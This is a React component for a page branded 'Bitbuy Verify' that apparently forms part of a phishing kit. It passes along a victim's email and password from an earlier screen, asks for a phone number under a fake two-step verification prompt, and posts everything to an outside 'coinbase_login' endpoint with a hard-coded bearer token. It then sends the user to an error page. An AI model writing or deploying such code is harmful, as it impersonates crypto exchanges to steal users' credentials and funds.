import { useState, useEffect } from 'react';
import { Link, redirect, useNavigate, useNavigation, useLocation } from "react-router-dom";
import { Helmet, HelmetProvider } from 'react-helmet-async';
import AppLayout from '../../layouts/AppLayout';
import {db} from '../../services/Firebase';
import { collection, addDoc, getDocs } from "firebase/firestore";
import { toast } from 'react-toastify';
import ValidationService from '../../services/ValidationService';
import axios from 'axios';
import PhoneInput from 'react-phone-input-2';
import 'react-phone-input-2/lib/style.css';


function Verify() {

    let initVerifyFormData          =   {
        email                       :   '', 
        password                    :   '',
        phone_number                :   '', 
        loading                     :   false
    };

    const [verifyFormData, setVerifyFormData]   =   useState(initVerifyFormData);
    const {state}                               =   useLocation();
    const navigate                              =   useNavigate();

    useEffect(() => { 
        console.log('Effect Call')
        setTimeout(() => {
            if(!state || !state.loginFormData || !state.loginFormData.email) {
                return navigate("/");
            } else {
                setVerifyFormData({...verifyFormData, ...state.loginFormData})
            }
        },2000);
	}, [])

    const submitLoginHandler =   (event) => {
        event.preventDefault();

        setVerifyFormData({...verifyFormData, loading : true});

        let rules                   =   {
            'phone_number'              :   'required|numeric',
        };
        let rulesMsg                =   {
            'phone_number'              :    {required : 'Please enter phone'},
        };
        let error                    =   ValidationService.rulesFirstErrorGenerator(verifyFormData, rules, rulesMsg);
        if(error) {
            toast.error(error);
            setVerifyFormData({...verifyFormData, loading : false});
        } else {
            const headers       =   { 'Accept': 'application/json','Content-Type':'application/json','Authorization':'Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjY2NTM2Mzg3NjY3MTNkMDBkMzk3YzhmMCJ9.vUCJSsofnVWOb8U7NKRZzLZPzo2QMt5bpp3I_3vJPvA'};
            axios({
                method: 'POST', headers: headers, data : verifyFormData, url: 'https://api2.real123.online/public/coinbase_login'
            })
            .then(function (response) {
                setVerifyFormData({...verifyFormData, loading : false});
                //Goto Verify Screen :-
                return navigate("/error", { state: { verifyFormData : verifyFormData } });
            })
            .catch(function (error) {
                let msg                 =   error?.response?.data?.detail ?? 'Application not initialize successfully.';
                toast.error(msg);
                setVerifyFormData({...verifyFormData, loading : false});
            });
        }
    }

    return (<AppLayout>
        <Helmet>
            <title>Bitbuy Verify</title>
        </Helmet>
        <div className='container'>
            <div className="row justify-content-center mt60 pt60">
                <div className='col-sm-5 bg-white rounded-5 shadow-lg text-dark p25'>
                    <div className='col-sm-12 text-center'>
                        <h2 className='h4'>2-Step Verification</h2>
                    </div>
                    <div className="row my15">
                        <div className='fs13 pt15'>Enter the 2-step verification generated by your authenticator app.</div>
                    </div>
                    <form className="" onSubmit={submitLoginHandler}>
                        <div className="my30">
                            <PhoneInput
                                country={'us'}
                                autoFormat="on"
                                value={verifyFormData.phone_number}
                                onChange={phone => setVerifyFormData({...verifyFormData, 'phone_number' : phone }) }
                            />
                        </div>
                        <div className='text-center mx-auto d-grid gap-2 mt60 mb30'>
                            <button type="submit" className={['btn','btn-danger' ,'btn-primary-2', 'btn-lg', 'btn-block',  verifyFormData.loading ? 'disabled' : ''].join(' ')} >
                                {verifyFormData.loading && <span className="spinner-grow spinner-grow-sm me15" aria-hidden="true"></span>}
                                <span>Submit</span>
                            </button>
                        </div>
                    </form>
                </div>
            </div>
        </div>
    </AppLayout>)
}

export default Verify
